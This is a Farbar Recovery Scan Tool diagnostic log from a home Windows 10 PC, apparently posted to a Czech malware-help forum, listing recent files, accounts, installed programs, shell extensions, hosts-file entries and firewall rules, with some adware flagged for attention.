2020-09-02 20:04 - 2020-03-20 23:40 - 000089749 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-09-02 20:04 - 2020-03-20 23:40 - 000017061 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-09-02 20:04 - 2019-03-19 06:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-09-02 20:01 - 2020-03-20 23:49 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-08-29 22:38 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-08-29 22:34 - 2020-03-20 23:30 - 000000000 ____D C:\Users\Milan
2020-08-29 18:15 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-29 18:14 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-08-29 17:33 - 2020-04-14 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Castlevania - The New Generation
2020-08-28 10:06 - 2020-06-07 10:48 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-28 10:06 - 2020-06-07 10:48 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-27 23:32 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-08-26 11:40 - 2020-03-20 23:34 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1738925715-1269715944-3180472622-1001
2020-08-26 11:40 - 2020-03-20 23:34 - 000000000 ___RD C:\Users\Milan\OneDrive
2020-08-26 11:40 - 2020-03-20 23:30 - 000002365 _____ C:\Users\Milan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-26 00:51 - 2020-04-11 00:56 - 000005712 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-08-25 12:48 - 2020-04-09 21:49 - 000006093 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-08-25 01:07 - 2020-04-08 22:17 - 000006094 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-08-24 12:54 - 2020-04-07 21:57 - 000006093 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-08-23 21:46 - 2020-04-06 21:57 - 000006615 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-08-15 14:23 - 2020-08-08 20:33 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (3)
2020-08-15 08:06 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 ___RD C:\Users\Milan\3D Objects
2020-08-12 21:39 - 2020-03-20 23:18 - 000353328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-08-12 21:37 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\servicing
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Kód: Vybrat vše
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-09-2020
Ran by Milan (11-09-2020 14:30:53)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version: - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
DiskFixer version 1.0 (HKLM-x32\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version: - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{D2D9559D-359A-4C61-B93A-FE01AE2BFB75}) (Version: 4.5.4 - Seiko Epson Corporation)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version: - )
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version: - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version: - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version: - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version: - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version: - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version: - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
Web Companion (HKLM-x32\...\{a99f66ff-7dd7-4937-89c9-70b6d9568932}) (Version: 6.0.2270.4122 - Lavasoft)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2015-12-11 16:14 - 2015-12-11 16:14 - 004968448 _____ (Seiko Epson Corporation) [File not signed] C:\Program Files\EpsonNet\EpsonNet Print\ENSTRMAPIe.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 06:49 - 2020-08-29 17:29 - 000001032 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 ultramediaburner.com
127.0.0.1 pro-zipper.com
127.0.0.1 productsdetails.online
127.0.0.1 post-back-url.com
127.0.0.1 rothsideadome.pw
127.0.0.1 room1.360dev.info
127.0.0.1 telechargini.com
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [{21A57DD2-2491-485C-BF53-169D9F586B7F}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe
FirewallRules: [UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{325BD370-A36E-489E-A599-AB133BADB490}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{2A891082-BCF5-4CD4-82EF-E3EF4198782E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{894A84BA-5FED-41DC-9186-4EC56F14C63B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{B74BA9EF-DF6C-486F-838D-27C253A82114}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{C7EB689E-FBBC-4034-A5E3-A156344389B6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{F2F85B56-CBE0-46DB-989F-B9836244F9B8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{53DB185F-AC50-407C-8DBC-868D5480C1B9}] => (Allow) C:\Users\Milan\AppData\Roaming\0246cded558e\0246cded558e.exe => No File
FirewallRules: [{4020593E-FA91-4C25-96FD-D5B1353F0BCE}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{C7C67AEC-310E-4B5C-9EB6-5A21BCCE399E}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E83DB169-47F1-4A9A-9D9C-AC419EE6E1CD}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{5EDBC54C-C446-429F-8C3A-586A14725ED5}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
